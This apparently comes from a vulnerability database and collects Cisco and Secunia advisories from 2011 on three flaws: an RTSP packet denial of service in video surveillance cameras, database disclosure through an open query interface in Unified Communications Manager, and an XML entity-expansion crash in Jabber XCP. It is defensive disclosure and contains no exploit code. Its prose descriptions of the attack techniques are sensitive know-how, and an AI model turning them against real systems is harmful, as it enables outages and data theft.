Cisco Video Surveillance 2421 and 2500 series cameras with software 1.1.x and 2.x before 2.4.0 and Video Surveillance 2600 series cameras with software before 4.2.0-13 allow remote attackers to cause a denial of service (device reload) by sending crafted RTSP packets over TCP, aka Bug IDs CSCtj96312, CSCtj39462, and CSCtl80175. Cisco Video Surveillance Camera has a service disruption ( Device reload ) There is a vulnerability that becomes a condition. The problem is Bug ID CSCtj96312 , CSCtj39462 ,and CSCtl80175 It is a problem.By a third party TCP Cleverly crafted via RTSP Service interruption due to packet transmission ( Device reload ) There is a possibility of being put into a state.
An attacker can exploit this issue to prevent a vulnerable device from sending video streams, and cause it to reload, triggering a denial-of-service condition.
This issue is tracked by Cisco Bug IDs CSCtj96312, CSCtj39462, and CSCtl80175.
An unauthenticated, remote attacker could exploit this vulnerability
by sending crafted RTSP TCP packets to an affected device. Successful
exploitation prevents cameras from sending video streams, subsequently
causing a reboot. The camera reboot is done automatically and does not
require action from an operator. Mitigations that can be deployed on Cisco devices within the
network are available.
This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-camera
Note: Effective October 18, 2011, Cisco moved the current list of
Cisco Security Advisories and Responses published by Cisco PSIRT. The
new location is:
http://tools.cisco.com/security/center/publicationListing
You can also navigate to this page from the Cisco Products and
Services menu of the Cisco Security Intelligence Operations (SIO)
Portal. Following this transition, new Cisco Security Advisories and
Responses will be published to the new location. Although the URL has
changed, the content of security documents and the vulnerability
policy are not impacted. Cisco will continue to disclose security
vulnerabilities in accordance with the published Security
Vulnerability Policy.
To check the version of system firmware that is running on the device
and to determine device model, log in to the device with the web
management interface, and navigate to the Status page.
This vulnerability can be exploited from both wired and wireless
segments.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtj96312, CSCtj39462, CSCtl80175 - Cisco Video Surveillance IP
Cameras RTSP Crafted Packet Vulnerability
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in DoS
condition. Subsequent exploitation may result in sustained DoS
condition, as the cameras will continue to reload.
Software Versions and Fixes
===========================
When considering software upgrades, also consult:
http://www.cisco.com/go/psirt
As well as any subsequent advisories to determine exposure and a
complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Mitigations that can be deployed on Cisco devices within the network
are available in the Cisco Applied Intelligence companion document
for this advisory, which is available at the following location:
http://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20111026-camera
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound by
the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
Or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at:
http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
- -----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
For additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was discovered during internal testing.
Status of this Notice: Final
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-camera
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-------------------------------------------------------------------+
| Revision 1.0 | 2011-October-19 | Internal draft release |
+-------------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iF4EAREIAAYFAk6m9iUACgkQQXnnBKKRMNASlQD/RzOv70SkRzbyJDYR6ORTkSMN
1hytBg8/Pk/rARp/3kcA/27uFSz6f54/R5oTlWHfolSUd0XJ9td+Gn1/MUi+c1Vf
=mtHP
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Cisco Video Surveillance IP Cameras RTSP TCP Packets Processing
Denial of Service
SECUNIA ADVISORY ID:
SA46611
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46611/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46611
RELEASE DATE:
2011-10-28
DISCUSS ADVISORY:
http://secunia.com/advisories/46611/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46611/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46611
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Cisco Video
Surveillance IP Cameras, which can be exploited by malicious people
to cause a DoS (Denial of Service).
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-camera
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201108-0013 | CVE-2011-1643 | Cisco Unified Communications Manager and Presence Server Information Disclosure Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x, 7.x before 7.1(5b)su4, 8.0, and 8.5 before 8.5(1)su2 and Cisco Unified Presence Server 6.x, 7.x, 8.0, and 8.5 before 8.5xnr allow remote attackers to read database data by connecting to a query interface through an SSL session, aka Bug IDs CSCti81574, CSCto63060, CSCto72183, and CSCto73833.
An attacker can exploit this issue to obtain potentially sensitive information. This may aid in further attacks.
This issue is being tracked by Cisco BugIds CSCti81574 , CSCto63060, CSCto72183 and CSCto73833. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Cisco Products Open Query Interface Information Disclosure Security
Issue
SECUNIA ADVISORY ID:
SA45772
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45772/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45772
RELEASE DATE:
2011-08-25
DISCUSS ADVISORY:
http://secunia.com/advisories/45772/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45772/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45772
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A security issue has been reported in Cisco Unified Communications
Manager and Cisco Unified Presence Server, which can be exploited by
malicious people to disclose sensitive information.
SOLUTION:
Apply updates. Please see vendor's advisory for details.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits kxlzx.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20110824-cucm-cups.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Cisco has released free updated software for most supported releases.
A security patch file is also available for all supported versions
that will remediate this issue. The patch may be applied to active
systems without requiring a reload. Customers are advised to apply a
fixed version or upgrade to a fixed train. Customers who need to stay
on a version for which updated software is not currently available or
who can not immediately apply the update are advised to apply the
patch.
No workarounds are available for this issue.
To exploit this issue, an attacker must have the ability to open an
SSL connection to an affected device via TCP ports 443 or 8443. A
completed three-way TCP handshake is required to exploit this
vulnerability.
This vulnerability has been assigned CVE identifier CVE-2011-1643. The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSCti81574 - Open Query Interface
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCto63060 - Open Query Interface
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCto72183 - Open Query Interface
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCto73833 - Open Query Interface
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in the full
disclosure of the contents of the affected products underlying
database.
Because the vulnerability is restricted to read-only access, it can
not be directly exploited to manipulate data held in the database.
However, with the appropriate knowledge an attacker could leverage
the obtained information to gain administrative access to the Web
based management interface.
Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a complete
upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+-------------------------------------------------------------------+
| Cisco Unified Communications Manager | First Fixed Release |
| Version | |
|---------------------------------------------+---------------------|
| 6.x | Apply COP File |
|---------------------------------------------+---------------------|
| | 7.1(5b)su4 or |
| 7.x | |
| | Apply COP File |
|---------------------------------------------+---------------------|
| 8.0 | Apply COP File |
|---------------------------------------------+---------------------|
| | 8.5(1)su2 or |
| 8.5 | |
| | Apply COP File |
|---------------------------------------------+---------------------|
| 8.6 | Not Affected |
+-------------------------------------------------------------------+
Note: The Cisco Unified Communications Manager Security COP file is
available for download from the Cisco Software Center.
+-------------------------------------------------------------------+
| Cisco Unified Presence | First Fixed Release |
| Server | |
|------------------------+------------------------------------------|
| 6.x | Migrate to 8.5xnr or later or 8.6(x) |
|------------------------+------------------------------------------|
| 7.x | Apply COP File or Migrate to 8.5xnr or |
| | later or 8.6(x) |
|------------------------+------------------------------------------|
| 8.0 | Apply COP File or Migrate to 8.5xnr or |
| | later or 8.6(x) |
|------------------------+------------------------------------------|
| 8.5 | 8.5xnr |
|------------------------+------------------------------------------|
| 8.6 | Not Affected |
+-------------------------------------------------------------------+
Note: A Cisco Unified Presence Server patch in the form of a Security
COP file is available via TAC for versions that do not currently have
a published fixed version.
Workarounds
===========
There are no known workarounds for this issue.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110824-cucm-cups.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
Or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
For additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public exploitation of the
vulnerability described in this advisory.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110824-cucm-cups.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-August-24 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
iF4EAREIAAYFAk5U/okACgkQQXnnBKKRMNDuPgD/TBkaFRIEZLjiXwEjUF2/Jo0k
MMWkPEU7APP/lKzJNhEBAIO7m5yVO+wgr6xpRNo+weq6VKOEPE+GS+QIvMZ0ZcOX
=ZWS7
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
VAR-201110-0251 | CVE-2011-3287 | Cisco Jabber Extensible Communications Platform Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Jabber Extensible Communications Platform (aka Jabber XCP) 2.x through 5.4.x before 5.4.0.27581 and 5.8.x before 5.8.1.27561 does not properly detect recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption, and process crash) via a crafted XML document containing a large number of nested entity references, aka Bug ID CSCtq78106, a similar issue to CVE-2003-1564. The problem is Bug ID CSCtq78106 It is a problem. Cisco Unified Presence and Jabber XCP are prone to a denial-of-service vulnerability.
Successful exploits will allow attackers to crash the affected server, denying service to legitimate users.
This issue is being tracked by the following Cisco Bug IDs:
CSCtq78106
CSCtq89842
CSCtq88547. An
unauthenticated, remote attacker could exploit this vulnerability by
sending malicious XML to an affected server. Successful exploitation
of this vulnerability could cause elevated memory and CPU
utilization, resulting in memory exhaustion and process crashes.
Repeated exploitation could result in a sustained DoS condition.
There are no workarounds available to mitigate exploitation of this
vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110928-xcpcupsxml.shtml. JabberNow appliances are also
affected if they are running a vulnerable version of Jabber XCP
software.
Jabber XCP and JabberNow Appliances
+----------------------------------
The following Jabber XCP software versions are affected by the
vulnerability in this advisory:
+------------------------------------------------------------+
| Versions | Builds |
|------------------+-----------------------------------------|
| 2.X | All builds |
|------------------+-----------------------------------------|
| 3.X | All builds |
|------------------+-----------------------------------------|
| 4.X | All builds |
|------------------+-----------------------------------------|
| 5.0 | All builds |
|------------------+-----------------------------------------|
| 5.1 | All builds |
|------------------+-----------------------------------------|
| 5.2 | All builds |
|------------------+-----------------------------------------|
| 5.4 | Prior to 5.4.0.27581 |
|------------------+-----------------------------------------|
| 5.8 | Prior to 5.8.1.27561 |
+------------------------------------------------------------+
Note: JabberNow appliances that are running these software versions
are also affected by the vulnerability in this advisory.
Determining Cisco Unified Presence Software Versions
+---------------------------------------------------
To determine the running version of Cisco Unified Presence software,
issue the "show version active" command from the command line
interface.
The following example shows Cisco Unified Presence software version
8.6.0:
admin: show version active
Active Master Version: 8.6.0.97041-43
Determining Jabber XCP Software Versions
+---------------------------------------
To determine the running version of Jabber XCP software, find the
"JABBER_VERSION" in the [JABBER_HOME]/var/cache/xcp_vars.sh file.
The following example shows Jabber XCP software version 5.8.1.17421:
JABBER_VERSION=5.8.1.17421
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
Jabber XCP and Cisco Unified Presence provide an open and extensible
platform that facilitates the secure exchange of availability and
instant messaging (IM) information. This attack is also known as an XML Bomb referring
to an XML document that is valid according to the rules of an XML
schema yet results in the hanging or crash of the parser or
underlying server. The attack is often referred to as the Billion
Laughs Attack because many proof of concept examples caused XML
parsers to expand the string lol or ha up to a billion times or until
server resources were exhausted.
The attack combines certain properties of XML to create valid but
malicious XML using an extreme level of nested substitutions. When an
XML parser attempts to expand all the nested entities it quickly
exhausts all server resources. The attack affects
both client-to-server connections as well as server-to-server
(federation) links.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtq78106 ("XCP Vulnerable to XML Entity Expansion Attack")
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq89842 ("CUP Server PE Vulnerable to XML Entity Expansion Attack")
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq88547 ("CUP Server Client Profile Agent Vulnerable to XML Entity
Expansion Attack")
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability could cause elevated
memory and CPU utilization, resulting in memory exhaustion and
process crashes. Repeated exploitation could result in a sustained
DoS condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+------------------------------------------------------------+
| Cisco Unified Presence Software | First Fixed |
| Version | Release |
|---------------------------------------+--------------------|
| All versions prior to 8.5(4) | Upgrade to 8.5(4) |
+------------------------------------------------------------+
+------------------------------------------------------------+
| Jabber XCP | |
| Software | |
| Version, | First Fixed Release |
| Including | |
| JabberNow | |
| Appliances | |
|------------------+-----------------------------------------|
| | These versions are vulnerable but are |
| | End of Life. No fixed software will be |
| Versions prior | made available. Cisco highly recommends |
| to 4.X | that customers using one of these |
| | versions migrate to a supported |
| | version. |
|------------------+-----------------------------------------|
| Versions 4.X - | Migrate to 5.4.0.27581, 5.8.1.27561, or |
| 5.2 | higher |
|------------------+-----------------------------------------|
| Version 5.4 | Upgrade to 5.4.0.27581, 5.8.1.27561, or |
| | higher |
|------------------+-----------------------------------------|
| Version 5.8 | Upgrade to 5.8.1.27561 or higher |
+------------------------------------------------------------+
Workarounds
===========
There are no available workarounds to mitigate this vulnerability.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
